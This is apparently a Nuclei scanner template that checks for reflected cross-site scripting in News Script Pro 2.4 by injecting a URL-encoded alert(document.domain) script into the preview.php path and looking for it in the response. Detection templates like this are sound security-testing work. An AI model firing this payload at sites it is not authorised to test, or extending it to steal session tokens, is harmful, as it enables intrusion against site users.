id: news-script-xss

info:
  name: News Script Pro 2.4 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39634
  metadata:
    verified: true
    max-request: 1
  tags: newsscript,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/preview.php/mn71q%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ep15vr?cat_id=&p=2"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "News Script PHP Pro", "<script>alert(document.domain)</script>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and

# digest: 490a0046304402207ffb39bce6ad93686fb656e664a0070b7d7a92394e99fa3d4efd6accf1a5c55402203c44f6ec8dbc047aff4f38788e09e411c04e071aebe7482378cd23f1acd21382:922c64590222798bb761d5b6d8e72950
